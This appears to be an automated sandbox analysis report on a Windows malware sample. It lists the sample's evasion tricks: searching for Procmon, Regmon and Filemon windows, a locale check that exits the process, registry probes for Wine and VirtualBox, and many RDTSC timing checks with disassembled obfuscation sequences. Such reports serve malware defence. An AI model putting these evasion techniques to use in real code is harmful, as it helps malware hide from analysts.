Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_00359860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-58515

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A1B0D second address: 5A1B11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7082BC second address: 7082D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8EA53EA35Dh 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7082D5 second address: 7082E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71EA72 second address: 71EA76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71EA76 second address: 71EA7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71EDAC second address: 71EDB6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8EA53EA35Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71F077 second address: 71F0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8EA4C24F9Ch 0x00000009 popad 0x0000000a pop ebx 0x0000000b jnp 00007F8EA4C24FB1h 0x00000011 jmp 00007F8EA4C24FA3h 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71F1CC second address: 71F1D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 722D63 second address: 722D8A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8EA4C24F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8EA4C24FA6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 722D8A second address: 722D90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 722EB6 second address: 722EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 722EBC second address: 722EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 722FA3 second address: 72300C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4C24FA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a and edx, 0F8D551Eh 0x00000010 push 00000000h 0x00000012 push 0EC8406Fh 0x00000017 pushad 0x00000018 jg 00007F8EA4C24F98h 0x0000001e push edx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 pop edx 0x00000022 popad 0x00000023 xor dword ptr [esp], 0EC840EFh 0x0000002a push 00000003h 0x0000002c push 00000000h 0x0000002e push 00000003h 0x00000030 mov esi, dword ptr [ebp+122D3997h] 0x00000036 call 00007F8EA4C24F99h 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e jmp 00007F8EA4C24FA7h 0x00000043 push eax 0x00000044 pop eax 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72300C second address: 723012 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 723012 second address: 723031 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4C24F9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jnc 00007F8EA4C24F96h 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 723031 second address: 723059 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8EA53EA35Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F8EA53EA35Dh 0x00000013 mov eax, dword ptr [eax] 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 723059 second address: 723070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jno 00007F8EA4C24F96h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 723070 second address: 723075 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 723075 second address: 72308F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 lea ebx, dword ptr [ebp+12454C45h] 0x0000000e clc 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007F8EA4C24F96h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72308F second address: 723095 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7231B1 second address: 7231C2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8EA4C24F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7231C2 second address: 7231C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7231C6 second address: 723201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edi 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F8EA4C24FA8h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8EA4C24FA0h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 723201 second address: 723225 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA53EA367h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 723225 second address: 723263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F8EA4C24F98h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 mov edx, dword ptr [ebp+122D37C7h] 0x00000028 lea ebx, dword ptr [ebp+12454C50h] 0x0000002e add dword ptr [ebp+122D2F38h], esi 0x00000034 push eax 0x00000035 pushad 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 723263 second address: 723269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74050D second address: 740513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74082D second address: 740833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 740C9A second address: 740CA4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8EA4C24F96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 740CA4 second address: 740CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 740CAE second address: 740CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8EA4C24F96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 740E07 second address: 740E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8EA53EA356h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 740E12 second address: 740E17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 740F7A second address: 740F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 740F81 second address: 740FCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4C24FA8h 0x00000007 jmp 00007F8EA4C24F9Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F8EA4C24FA5h 0x00000014 jg 00007F8EA4C24F9Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74112D second address: 741137 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8EA53EA35Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 735BEE second address: 735BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 735BF2 second address: 735BFC instructions: 0x00000000 rdtsc 0x00000002 je 00007F8EA53EA356h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 735BFC second address: 735C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7172A3 second address: 7172A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 748E52 second address: 748E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 749143 second address: 749147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 749147 second address: 749151 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8EA4C24F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74E4FC second address: 74E502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74E502 second address: 74E50B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74E50B second address: 74E533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F8EA53EA35Ah 0x0000000d je 00007F8EA53EA360h 0x00000013 jmp 00007F8EA53EA35Ah 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 706872 second address: 70687D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70687D second address: 706888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8EA53EA356h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74D988 second address: 74D998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8EA4C24F96h 0x0000000a pop edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74DB53 second address: 74DB59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74E27E second address: 74E282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74E282 second address: 74E286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74EBDE second address: 74EBE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74EBE2 second address: 74EBE8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74ED00 second address: 74ED06 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74ED06 second address: 74ED0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74ED0B second address: 74ED11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74EDF3 second address: 74EDF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74F38D second address: 74F391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74F391 second address: 74F395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74F7CE second address: 74F7ED instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8EA4C24F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebx 0x0000000e xor edi, dword ptr [ebp+122D3887h] 0x00000014 nop 0x00000015 push eax 0x00000016 push edx 0x00000017 jno 00007F8EA4C24F98h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74FAA4 second address: 74FAA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74FB70 second address: 74FB92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8EA4C24FA7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74FB92 second address: 74FB98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74FDDD second address: 74FE32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jc 00007F8EA4C24F96h 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 jns 00007F8EA4C24FA8h 0x00000017 nop 0x00000018 xor di, D587h 0x0000001d jmp 00007F8EA4C24FA1h 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F8EA4C24FA2h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74FE32 second address: 74FE5B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8EA53EA358h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F8EA53EA367h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74FE5B second address: 74FE60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74FE60 second address: 74FE6A instructions: 0x00000000 rdtsc 0x00000002 je 00007F8EA53EA35Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7502D8 second address: 7502EA instructions: 0x00000000 rdtsc 0x00000002 je 00007F8EA4C24F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7502EA second address: 7502EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7502EE second address: 7502F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7502F4 second address: 750373 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA53EA360h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F8EA53EA363h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F8EA53EA358h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F8EA53EA358h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 mov dword ptr [ebp+122D1ECCh], edi 0x0000004d xor si, D6BFh 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push ecx 0x00000058 pop ecx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 750373 second address: 750379 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 750379 second address: 75037E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 750AC9 second address: 750ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7533F7 second address: 753413 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8EA53EA363h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 753D57 second address: 753D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7526D2 second address: 7526DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 753D5B second address: 753D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 753B46 second address: 753B50 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8EA53EA356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 753B50 second address: 753B5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F8EA4C24F96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7552CF second address: 7552E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8EA53EA362h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75D9C8 second address: 75D9EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F8EA4C24FA7h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75EA7E second address: 75EA8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F8EA53EA356h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75EA8C second address: 75EB24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4C24F9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F8EA4C24F98h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D25B4h], eax 0x0000002d push 00000000h 0x0000002f xor dword ptr [ebp+122D1C9Dh], eax 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebp 0x0000003a call 00007F8EA4C24F98h 0x0000003f pop ebp 0x00000040 mov dword ptr [esp+04h], ebp 0x00000044 add dword ptr [esp+04h], 00000016h 0x0000004c inc ebp 0x0000004d push ebp 0x0000004e ret 0x0000004f pop ebp 0x00000050 ret 0x00000051 pushad 0x00000052 sbb ch, FFFFFF86h 0x00000055 jnl 00007F8EA4C24F9Ch 0x0000005b popad 0x0000005c pushad 0x0000005d mov di, dx 0x00000060 movzx edi, cx 0x00000063 popad 0x00000064 xchg eax, esi 0x00000065 jmp 00007F8EA4C24FA0h 0x0000006a push eax 0x0000006b pushad 0x0000006c jc 00007F8EA4C24F9Ch 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75ABA5 second address: 75ABAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
